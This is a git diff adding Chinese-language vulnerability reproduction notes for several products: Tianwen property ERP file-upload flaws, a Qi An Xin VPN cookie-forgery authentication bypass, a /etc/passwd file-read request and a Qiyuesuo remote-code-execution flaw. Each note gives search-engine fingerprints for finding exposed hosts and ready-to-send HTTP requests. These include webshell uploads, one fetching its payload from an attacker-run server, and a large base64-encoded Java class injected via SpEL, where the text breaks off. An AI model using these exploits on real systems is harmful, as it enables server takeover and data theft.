+Content-Type: application/x-www-form-urlencoded
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-site
+Content-Length: 67
+
+filename=1.txt&filepath=/etc/passwd
+```
+
+![image-20241025114628455](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251146576.png)
\ No newline at end of file
diff --git a/天问物业ERP系统AjaxUpload.aspx前台任意文件上传漏洞.md b/天问物业ERP系统AjaxUpload.aspx前台任意文件上传漏洞.md
new file mode 100644
index 0000000..f07236c
--- /dev/null
+++ b/天问物业ERP系统AjaxUpload.aspx前台任意文件上传漏洞.md
@@ -0,0 +1,61 @@
+# 天问物业ERP系统AjaxUpload.aspx前台任意文件上传漏洞
+
+# 一、漏洞简介
+成都天问互联科技有限公司以软件开发和技术服务为基础，建立物业ERP应用系统，向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案。天问物业ERP系统AjaxUpload.aspx存在文件上传漏洞，攻击者可以利用漏洞上传恶意文件获取服务器权限。
+
+# 二、影响版本
++ 天问物业ERP系统
+
+# 三、资产测绘
++ fofa`body="国家版权局软著登字第1205328号"`
++ 登录页面
+
+![1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25.png](./img/d6vB92k0Q8TnoVUk/1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25-035158.png)
+
+# 四、漏洞复现
+```plain
+POST /HM/M_Main/AjaxUpload.aspx HTTP/1.1
+Content-Type: multipart/form-data; boundary=00content0boundary00
+User-Agent: Java/1.8.0_381
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 487
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="UpFileData"; filename="1.ashx"
+
+<% @ webhandler language="C#" class="AverageHandler" %> 
+using System; 
+using System.Web; 
+
+public class AverageHandler : IHttpHandler 
+{ 
+    public bool IsReusable 
+    { 
+        get {
+             return true; 
+            } 
+        } 
+        public void ProcessRequest(HttpContext ctx) 
+        { 
+            ctx.Response.Write("hello"); 
+        } 
+    }
+--00content0boundary00--
+```
+
+![1722408255216-15f7f99d-8425-464c-a984-65cd6460fb92.png](./img/d6vB92k0Q8TnoVUk/1722408255216-15f7f99d-8425-464c-a984-65cd6460fb92-880167.png)
+
+上传文件位置
+
+```plain
+http://xx.xx.xx.xx/HM/M_Main/UploadFiles/PersonAdjunct/2023/08/202382894343759.ashx
+```
+
+![1693187101786-501c2a90-3793-4c83-bfab-d53d25af370e.png](./img/d6vB92k0Q8TnoVUk/1693187101786-501c2a90-3793-4c83-bfab-d53d25af370e-114616.png)
+
+
+
+> 更新: 2024-08-12 17:21:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hev6npn6s7eab8t2>
\ No newline at end of file
diff --git a/天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞.md b/天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞.md
new file mode 100644
index 0000000..2655352
--- /dev/null
+++ b/天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞.md
@@ -0,0 +1,77 @@
+# 天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞
+
+# 一、漏洞简介
+天问物业ERP系统使用了UEditor编辑器，Ueditor是百度开发的一个网站编辑器，目前已经不对其进行后续开发和更新，该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响，.net存在任意文件上传，绕过文件格式的限制，在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
+
+# 二、影响版本
++ 天问物业ERP系统
+
+# 三、资产测绘
++ fofa`body="国家版权局软著登字第1205328号"`
++ 登录页面
+
+![1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25.png](./img/K_9Hxjp7rVHtd8qW/1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25-559103.png)
+
+# 四、漏洞复现
+1. 新建文件，内容为webshell，文件命令为`1.png`
+
+```plain
+<% @ webhandler language="C#" class="AverageHandler" %> 
+
+using System; 
+using System.Web; 
+
+public class AverageHandler : IHttpHandler 
+{ 
+public bool IsReusable 
+{ get { return true; } } 
+public void ProcessRequest(HttpContext ctx) 
+{ 
+ctx.Response.Write("hello"); 
+} 
+}
+```
+
+![1699459699279-92ff0e65-bd41-4ccd-ab54-94d03f956434.png](./img/K_9Hxjp7rVHtd8qW/1699459699279-92ff0e65-bd41-4ccd-ab54-94d03f956434-141843.png)
+
+2. 将`1.png`传到vpn上，使用python起个http服务
+
+```plain
+python3 -m http.server 50000
+```
+
+![1699459777311-e5d1732e-d61d-48a9-899e-b7a851536905.png](./img/K_9Hxjp7rVHtd8qW/1699459777311-e5d1732e-d61d-48a9-899e-b7a851536905-810103.png)
+
+4. 替换`source[]`为webshell文件地址，通过exp上传文件
+
+```plain
+POST /HM/M_main/Jscript-Ui/UEditor/net/controller.ashx?action=catchimage HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 47
+Origin: null
+Connection: close
+Cookie: ASP.NET_SessionId=mzare1hg1ewzaxhakacjhfo0
+Upgrade-Insecure-Requests: 1
+
+source[]=http://xx.xx.xx.xx:50000/1.png?.ashx
+```
+
+![1699459840110-a48401c5-7f95-44c7-b8d7-c03b791f76f2.png](./img/K_9Hxjp7rVHtd8qW/1699459840110-a48401c5-7f95-44c7-b8d7-c03b791f76f2-870382.png)
+
+5. 上传文件位置
+
+```plain
+/HM/M_main/Jscript-Ui/UEditor/net/upload/image/20231109/6383508541150163493063174.ashx
+```
+
+![1699459950239-dc62eae6-3df6-4fdb-b1eb-4da0f525b4dd.png](./img/K_9Hxjp7rVHtd8qW/1699459950239-dc62eae6-3df6-4fdb-b1eb-4da0f525b4dd-177142.png)
+
+
+
+> 更新: 2024-03-03 20:04:36  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ytzd6rysuc9t66vs>
\ No newline at end of file
diff --git a/天问物业ERP系统UpFile.aspx前台任意文件上传漏洞.md b/天问物业ERP系统UpFile.aspx前台任意文件上传漏洞.md
new file mode 100644
index 0000000..1106b47
--- /dev/null
+++ b/天问物业ERP系统UpFile.aspx前台任意文件上传漏洞.md
@@ -0,0 +1,62 @@
+# 天问物业ERP系统UpFile.aspx前台任意文件上传漏洞
+
+# 一、漏洞简介
+成都天问互联科技有限公司以软件开发和技术服务为基础，建立物业ERP应用系统，向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案。天问物业ERP系统UpFile.aspx存在文件上传漏洞，攻击者可以利用漏洞上传恶意文件获取服务器权限。
+
+# 二、影响版本
++ 天问物业ERP
+
+# 三、资产测绘
++ fofa`body="国家版权局软著登字第1205328号"`
++ 登录页面
+
+![1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25.png](./img/_FtyxihXp3rud9CH/1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25-373502.png)
+
+# 四、漏洞复现
+```plain
+POST /HM/M_Main/UpLoad/UpFile.aspx HTTP/1.1
+Content-Type: multipart/form-data; boundary=00content0boundary00
+User-Agent: Java/1.8.0_381
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 487
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="UpFileData"; filename="1.ashx"
+
+<% @ webhandler language="C#" class="AverageHandler" %> 
+using System; 
+using System.Web; 
+
+public class AverageHandler : IHttpHandler 
+{ 
+    public bool IsReusable 
+    { 
+        get {
+             return true; 
+            } 
+        } 
+        public void ProcessRequest(HttpContext ctx) 
+        { 
+            ctx.Response.Write("hello"); 
+        } 
+    }
+--00content0boundary00--
+
+```
+
+![1693187626139-0df6a426-9972-4c38-a24c-9171d529de33.png](./img/_FtyxihXp3rud9CH/1693187626139-0df6a426-9972-4c38-a24c-9171d529de33-838752.png)
+
+上传文件位置
+
+```plain
+http://xx.xx.xx.xx/UpLoadFile//Sys_HeaderImage/2023/08/493216795627.ashx
+```
+
+![1693187670717-7b037f1f-9a4b-4c70-928a-a580716b4480.png](./img/_FtyxihXp3rud9CH/1693187670717-7b037f1f-9a4b-4c70-928a-a580716b4480-501028.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tw7n0fcma3hvp61o>
\ No newline at end of file
diff --git a/天问物业ERP系统UploadFile.aspx前台任意文件上传漏洞.md b/天问物业ERP系统UploadFile.aspx前台任意文件上传漏洞.md
new file mode 100644
index 0000000..98fca8c
--- /dev/null
+++ b/天问物业ERP系统UploadFile.aspx前台任意文件上传漏洞.md
@@ -0,0 +1,46 @@
+# 天问物业ERP系统UploadFile.aspx前台任意文件上传漏洞
+
+# 一、漏洞简介
+成都天问互联科技有限公司以软件开发和技术服务为基础，建立物业ERP应用系统，向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案。天问物业ERP系统UploadFile.aspx存在文件上传漏洞，攻击者可以利用漏洞上传恶意文件获取服务器权限。
+
+# 二、影响版本
++ 天问物业ERP
+
+# 三、资产测绘
++ fofa`body="国家版权局软著登字第1205328号"`
++ 登录页面
+
+![1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25.png](./img/J2_C_Y4Qr5o1xHu9/1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25-343768.png)
+
+# 四、漏洞复现
+```plain
+POST /HM/M_Main/IntroductionManage/UploadFile.aspx HTTP/1.1
+Content-Type: multipart/form-data; boundary=00content0boundary00
+User-Agent: Java/1.8.0_301
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 121
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="1.aspx"
+
+123
+--00content0boundary00--
+
+```
+
+![1695998047798-2dbf7f98-d149-4b2e-8011-5cbe22d5ed0f.png](./img/J2_C_Y4Qr5o1xHu9/1695998047798-2dbf7f98-d149-4b2e-8011-5cbe22d5ed0f-430331.png)
+
+上传文件地址
+
+```plain
+http://xx.xx.xx.xx/HM/M_Main/UploadFiles/IntroductionManage/20230929223355771.aspx
+```
+
+![1695998090992-c516e5ef-fa76-4fa7-8286-505dd6527b40.png](./img/J2_C_Y4Qr5o1xHu9/1695998090992-c516e5ef-fa76-4fa7-8286-505dd6527b40-165592.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aulalbh07a6ga4py>
\ No newline at end of file
diff --git a/奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞.md b/奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞.md
new file mode 100644
index 0000000..d18c13e
--- /dev/null
+++ b/奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞.md
@@ -0,0 +1,41 @@
+# 奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(23, 46, 77);">奇安信安全接入网关系统（SSL VPN）在满足客户的身份安全、传输加密、访问授权等多种安全需求基础上，针对 BYOD 及 CYOD 等移动办公场景，提供统一的安全办公接入入口、门户式单点登录、应用 APP安全加固、移动应用数据安全，从而为客户提供“一站式”安全移动办公解决方案。奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞。</font>
+
+# 二、影响版本
++ 奇安信VPN
+
+# 三、资产测绘
++ hunter`app.name="奇安信 VPN"`
++ 特征
+
+![1698460379128-d226d33b-a8e8-4d70-b6e8-c17676d964c7.png](./img/IlJ3sRJ1ekzuj2bY/1698460379128-d226d33b-a8e8-4d70-b6e8-c17676d964c7-328271.png)
+
+# 四、漏洞复现
+用户遍历
+
+修改`cookie：admin_id=1; gw_admin_ticket=1;`访问出现如下页面表示存在漏洞
+
+```plain
+GET /admin/group/x_group.php?id=1 HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Cookie: admin_id=1; gw_admin_ticket=1;
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+```
+
+![1698460517620-2321d0c0-3c69-4610-89df-b5c0a420d5f4.png](./img/IlJ3sRJ1ekzuj2bY/1698460517620-2321d0c0-3c69-4610-89df-b5c0a420d5f4-766217.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/liitlbcoprgaf65r>
\ No newline at end of file
diff --git a/契约锁edits存在远程命令执行漏洞.md b/契约锁edits存在远程命令执行漏洞.md
new file mode 100644
index 0000000..b66e150
--- /dev/null
+++ b/契约锁edits存在远程命令执行漏洞.md
@@ -0,0 +1,36 @@
+# 契约锁edits存在远程命令执行漏洞
+
+# 一、漏洞简介
+Qiyuesuo是一款数字化可信基础服务平台，为组织提供“数字身份、电子签章、印章管控以及数据存证服务”于一体的数字化可信基础解决方案。Qiyuesuo存在前台代码执行漏洞，攻击者可构造恶意请求绕过相关认证调用后台功能造成远程代码执行，控制服务器。
+
+# 二、影响版本
++ 契约锁
+
+# 三、资产测绘
++ fofa`app="契约锁-电子签署平台"`
++ 特征
+
+![1717569204388-1722148f-4f83-4ad5-83a5-33896b546916.png](./img/2GBNUvKibEDYzpYA/1717569204388-1722148f-4f83-4ad5-83a5-33896b546916-386315.png)
+
+# 四、漏洞复现
+```java
+POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/json
+Connection: close
+X-State: id
+Content-Length: 9778
+
+{"id":"2","params":[{"expression":"var a=new org.springframework.expression.spel.standard.SpelExpressionParser();var b='VCAob3JnLnNwcmluZ2ZyYW1ld29yay5jZ2xpYi5jb3JlLlJlZmxlY3RVdGlscykuZGVmaW5lQ2xhc3MoIlF5c1Rlc3QiLFQgKG9yZy5zcHJpbmdmcmFtZXdvcmsudXRpbC5CYXNlNjRVdGlscykuIGRlY29kZUZyb21TdHJpbmcoInl2NjZ2Z0FBQURJQktBb0FJUUNXQ0FDWENnQ1lBSmtLQUpnQW1nb0Ftd0NjQ0FDZENnQ2JBSjRIQUo4SUFLQUlBS0VJQUtJSUFLTUtBQjhBcEFvQXBRQ21DQUNuQ2dDWUFLZ0tBS1VBcVFjQWd3b0FtQUNxQ0FDckNnQXNBS3dLQUNFQXJRb0FId0NxQ0FDdUNnQWZBSzhLQUxBQXFnZ0FzUW9BTEFDeUNBQ3pDQUMwQndDMUNnQWZBTFlIQUxjS0FMZ0F1UWdBdWdjQXV3Z0F2QWdBdlFjQXZnb0FKd0MvQ2dBbkFNQUtBQ2NBd1FnQXdnY0F3d2dBeEFnQXhRa0F4Z0RIQ2dER0FNZ0lBTWtIQU1vSUFNc0lBTXdJQU0wS0FNNEF6d29BTEFEUUNBRFJDQURTQ0FEVENBRFVDQURWQndEV0NnRFhBTmdLQU5jQTJRb0EyZ0RiQ2dBOUFOd0lBTjBLQUQwQTNnb0FQUURmQndEZ0NnQkZBSllJQU9FS0FDd0E0Z29BUlFEakNBRGtDQURsQndEbUNnQk1BT2NJQU9nSEFPa0JBQVk4YVc1cGRENEJBQU1vS1ZZQkFBUkRiMlJsQVFBUFRHbHVaVTUxYldKbGNsUmhZbXhsQVFBU1RHOWpZV3hXWVhKcFlXSnNaVlJoWW14bEFRQUVkR2hwY3dFQUNVeFJlWE5VWlhOME93RUFDR1J2U1c1cVpXTjBBUUFVS0NsTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBVjJZWEl5T0FFQUlreHFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmpzQkFBVjJZWEl5TmdFQUdVeHFZWFpoTDJ4aGJtY3ZjbVZtYkdWamRDOUdhV1ZzWkRzQkFBVjJZWEl5TndFQUlVeHFZWFpoTDJ4aGJtY3ZUbTlUZFdOb1RXVjBhRzlrUlhoalpYQjBhVzl1T3dFQUJYWmhjak14QVFBRmRtRnlNeklCQUJKTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFBVjJZWEl6TXdFQUJYSmxjRzl1QVFBRGMzUnlBUUFTVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3QVFBRVkyMWtjd0VBRTF0TWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFBbHlaWE4xYkhSVGRISUJBQVpsYm1OdlpHVUJBQVYyWVhJek1BRUFCWFpoY2pJNUFRQUJTUUVBQlhaaGNqSXhBUUFGZG1GeU1qSUJBQVYyWVhJeU13RUFCWFpoY2pJMEFRQUZkbUZ5TWpVQkFBVjJZWEkzT0FFQUZVeHFZWFpoTDNWMGFXd3ZRWEp5WVhsTWFYTjBPd0VBQlhaaGNqSXdBUUFGZG1GeU1Ua0JBQkpNYW1GMllTOXNZVzVuTDFSb2NtVmhaRHNCQUFWMllYSXhPQUVBQkhaaGNqZ0JBQVIyWVhJNUFRQVhUR3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2pzQkFBVjJZWEl4TUFFQUVVeHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0FRQUZkbUZ5TVRFQkFBVjJZWEl4TWdFQUJYWmhjakV6QVFBRmRtRnlNVFFCQUFWMllYSXhOUUVBQlhaaGNqRTJBUUFUVzB4cVlYWmhMMnhoYm1jdlZHaHlaV0ZrT3dFQUJYWmhjakUzQVFBQldnRUFGVXhxWVhaaEwyeGhibWN2UlhoalpYQjBhVzl1T3dFQUEyMXpad0VBRFZOMFlXTnJUV0Z3VkdGaWJHVUhBTU1IQU9vSEFPc0hBSjhIQUxVSEFPd0hBTGNIQUxzSEFMNEhBR2NIQU9ZQkFBcFRiM1Z5WTJWR2FXeGxBUUFNVVhselZHVnpkQzVxWVhaaERBQlFBRkVCQUFWemRHRnlkQWNBNmd3QTdRRHVEQUR2QVBBSEFPc01BUEVBOEFFQUhXOXlaeTVoY0dGamFHVXVZMjk1YjNSbExsSmxjWFZsYzNSSmJtWnZEQUR5QVBNQkFDQnFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmdFQUVHcGhkbUV1YkdGdVp5NVVhSEpsWVdRQkFCVnFZWFpoTG14aGJtY3VWR2h5WldGa1IzSnZkWEFCQUNKdmNtY3VZWEJoWTJobExtTnZlVzkwWlM1U1pYRjFaWE4wUjNKdmRYQkpibVp2QVFBSGRHaHlaV0ZrY3d3QTlBRDFCd0RzREFEMkFQY0JBQVowWVhKblpYUU1BUGdBK1F3QStnRDdEQUQ4QUZnQkFBUm9kSFJ3REFEOUFQNE1BUDhCQUFFQUNVVnVaSEJ2YVc1MEpBd0JBUUVDQndFREFRQWFiM0puTG1Gd1lXTm9aUzUwYjIxallYUXVkWFJwYkM1dVpYUU1BUVFCQlFFQUJuUm9hWE1rTUFFQUNtZGxkRWhoYm1Sc1pYSUJBQTlxWVhaaEwyeGhibWN2UTJ4aGMzTU1BUVlCQndFQUVHcGhkbUV2YkdGdVp5OVBZbXBsWTNRSEFRZ01BUWtCQ2dFQUNXZGxkRWRzYjJKaGJBRUFIMnBoZG1FdmJHRnVaeTlPYjFOMVkyaE5aWFJvYjJSRmVHTmxjSFJwYjI0QkFBWm5iRzlpWVd3QkFBcHdjbTlqWlhOemIzSnpBUUFUYW1GMllTOTFkR2xzTDBGeWNtRjVUR2x6ZEF3QkN3RU1EQUVOQVE0TUFQb0JEd0VBRTJkbGRGZHZjbXRsY2xSb2NtVmhaRTVoYldVQkFCQnFZWFpoTDJ4aGJtY3ZVM1J5YVc1bkFRQURjbVZ4QVFBSFoyVjBUbTkwWlFjQkVBd0JFUUI4REFFU0FSTUJBQXRuWlhSU1pYTndiMjV6WlFFQUVsdE1hbUYyWVM5c1lXNW5MME5zWVhOek93RUFDV2RsZEVobFlXUmxjZ0VBQjFndFUzUmhkR1VCQUFkdmN5NXVZVzFsQndFVURBRVZBUllNQVJjQVdBRUFCbmRwYm1SdmR3RUFCMk50WkM1bGVHVUJBQUl2WXdFQUJ5OWlhVzR2YzJnQkFBSXRZd0VBRVdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5QndFWURBRVpBUm9NQVJzQkhBY0JIUXdCSGdFZkRBQlFBU0FCQUFKY1FRd0JJUUVpREFFakFGZ0JBQlp6ZFc0dmJXbHpZeTlDUVZORk5qUkZibU52WkdWeUFRQUZWVlJHTFRnTUFTUUJKUXdBYVFFbUFRQUpZV1JrU0dWaFpHVnlBUUFIYzNWalkyVnpjd0VBRTJwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0TUFTY0FVUUVBQldWeWNtOXlBUUFIVVhselZHVnpkQUVBRUdwaGRtRXZiR0Z1Wnk5VWFISmxZV1FCQUJWcVlYWmhMMnhoYm1jdlEyeGhjM05NYjJGa1pYSUJBQmRxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlHYVdWc1pBRUFEV04xY25KbGJuUlVhSEpsWVdRQkFCUW9LVXhxWVhaaEwyeGhibWN2VkdoeVpXRmtPd0VBRldkbGRFTnZiblJsZUhSRGJHRnpjMHh2WVdSbGNnRUFHU2dwVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjMHh2WVdSbGNqc0JBQWxuWlhSUVlYSmxiblFCQUFsc2IyRmtRMnhoYzNNQkFDVW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2UTJ4aGMzTTdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3dFQURYTmxkRUZqWTJWemMybGliR1VCQUFRb1dpbFdBUUFPWjJWMFZHaHlaV0ZrUjNKdmRYQUJBQmtvS1V4cVlYWmhMMnhoYm1jdlZHaHlaV0ZrUjNKdmRYQTdBUUFEWjJWMEFRQW1LRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPeWxNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNCQUFkblpYUk9ZVzFsQVFBSVkyOXVkR0ZwYm5NQkFCc29UR3BoZG1FdmJHRnVaeTlEYUdGeVUyVnhkV1Z1WTJVN0tWb0JBQWhuWlhSRGJHRnpjd0VBRXlncFRHcGhkbUV2YkdGdVp5OURiR0Z6Y3pzQkFBcG5aWFJRWVdOcllXZGxBUUFWS0NsTWFtRjJZUzlzWVc1bkwxQmhZMnRoWjJVN0FRQVJhbUYyWVM5c1lXNW5MMUJoWTJ0aFoyVUJBQVpsY1hWaGJITUJBQlVvVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3S1ZvQkFBbG5aWFJOWlhSb2IyUUJBRUFvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3VzB4cVlYWmhMMnhoYm1jdlEyeGhjM003S1V4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5TlpYUm9iMlE3QVFBWWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrQVFBR2FXNTJiMnRsQVFBNUtFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME8xdE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdBUUFGWTJ4dmJtVUJBQlFvS1V4cVlYWmhMMnhoYm1jdlQySnFaV04wT3dFQUJITnBlbVVCQUFNb0tVa0JBQlVvU1NsTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzQkFCRnFZWFpoTDJ4aGJtY3ZTVzUwWldkbGNnRUFCRlJaVUVVQkFBZDJZV3gxWlU5bUFRQVdLRWtwVEdwaGRtRXZiR0Z1Wnk5SmJuUmxaMlZ5T3dFQUVHcGhkbUV2YkdGdVp5OVRlWE4wWlcwQkFBdG5aWFJRY205d1pYSjBlUUVBSmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQUxkRzlNYjNkbGNrTmhjMlVCQUJGcVlYWmhMMnhoYm1jdlVuVnVkR2x0WlFFQUNtZGxkRkoxYm5ScGJXVUJBQlVvS1V4cVlYWmhMMnhoYm1jdlVuVnVkR2x0WlRzQkFBUmxlR1ZqQVFBb0tGdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlRY205alpYTnpPd0VBRVdwaGRtRXZiR0Z1Wnk5UWNtOWpaWE56QVFBT1oyVjBTVzV3ZFhSVGRISmxZVzBCQUJjb0tVeHFZWFpoTDJsdkwwbHVjSFYwVTNSeVpXRnRPd0VBR0NoTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc3BWZ0VBREhWelpVUmxiR2x0YVhSbGNnRUFKeWhNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZkWFJwYkM5VFkyRnVibVZ5T3dFQUJHNWxlSFFCQUFoblpYUkNlWFJsY3dFQUZpaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BXMElCQUJZb1cwSXBUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFQY0hKcGJuUlRkR0ZqYTFSeVlXTmxBQ0VBVHdBaEFBQUFBQUFDQUFFQVVBQlJBQUVBVWdBQUFDOEFBUUFCQUFBQUJTcTNBQUd4QUFBQUFnQlRBQUFBQmdBQkFBQUFDUUJVQUFBQURBQUJBQUFBQlFCVkFGWUFBQUFKQUZjQVdBQUJBRklBQUFjaUFBWUFJQUFBQXVrU0FrdTRBQU5NSzdZQUJMWUFCVTBzRWdhMkFBZFhwd0FKVGl1MkFBUk5MQklKdGdBSFRpd1NDcllBQnpvRUxCSUd0Z0FIT2dVc0VndTJBQWM2QmhrRUVneTJBQTA2QnhrSEJMWUFEaTBTRDdZQURUb0lHUWdFdGdBT0dRY3J0Z0FRdGdBUndBQVN3QUFTd0FBU3dBQVNPZ2tETmdvRE5nc1ZDeGtKdnFJQ1hCa0pGUXN5T2d3WkRNWUNTaGtNdGdBVEVoUzJBQldaQWowWkNCa010Z0FST2cwWkRjWUNMeGtOdGdBV3RnQVhFaGkyQUJXWkFoOFpEYllBRnJZQUdiWUFHaElidGdBY21RSU1HUTIyQUJZU0hiWUFEVG9PR1E0RXRnQU9HUTRaRGJZQUVUb1BHUSsyQUJZU0hnTzlBQisyQUNBWkR3TzlBQ0cyQUNJNkVBRTZFUmtRdGdBV0VpTUR2UUFmdGdBZ0dSQUR2UUFodGdBaU9oR25BQ0E2RWhrUXRnQVdFaVcyQUEwNkV4a1RCTFlBRGhrVEdSQzJBQkU2RVJrR0VpYTJBQTA2RWhrU0JMWUFEaGtTR1JHMkFCSEFBQ2M2RXhrVHRnQW93QUFuT2hRRE5oVVZGUmtVdGdBcG9nRmlHUlFWRmJZQUtqb1dHUmJHQVU0WkJSSXJBNzBBSDdZQUlCa1dBNzBBSWJZQUlzQUFMRG9YR1JmR0FUQVpGN2dBQTdZQUU3WUFISmtCSWhrRkVpMjJBQTA2R0JrWUJMWUFEaGtZR1JhMkFCRTZHUmtadGdBV0VpNEV2UUFmV1FPeUFDOVR0Z0FnR1JrRXZRQWhXUU1FdUFBd1U3WUFJam9hR1JxMkFCWVNNUU85QUIvQUFESzJBQ0FaR2dPOUFDRzJBQ0k2R3hrWnRnQVdFak1FdlFBZldRTVRBQ3hUdGdBZ0dSa0V2UUFoV1FNU05GTzJBQ0xBQUN3NkhCSTF1QUEydGdBM0VqaTJBQldaQUJrR3ZRQXNXUU1TT1ZOWkJCSTZVMWtGR1J4VHB3QVdCcjBBTEZrREVqdFRXUVFTUEZOWkJSa2NVem9kdXdBOVdiZ0FQaGtkdGdBL3RnQkF0d0JCRWtLMkFFTzJBRVE2SHJzQVJWbTNBRVlaSGhKSHRnQkl0Z0JKT2g4Wkc3WUFGaEpLQmIwQUgxa0RFd0FzVTFrRUV3QXNVN1lBSUJrYkJiMEFJVmtERWpSVFdRUVpIbE8yQUNKWEJEWUtwd0FKaEJVQnAvNmFGUXFaQUFhbkFBbUVDd0duL2FJU1MwdW5BQXRNSzdZQVRSSk9TeXF3QUFNQUR3QVdBQmtBQ0FFQkFSb0JIUUFrQUFNQzNBTGZBRXdBQXdCVEFBQUJBZ0JBQUFBQUN3QURBQTRBQndBUEFBOEFFZ0FXQUJVQUdRQVRBQm9BRkFBZkFCY0FKZ0FZQUM0QUdRQTJBQm9BUGdBYkFFY0FIQUJOQUIwQVZRQWVBRnNBSHdCeUFDQUFkUUFpQUlBQUl3Q0hBQ1FBb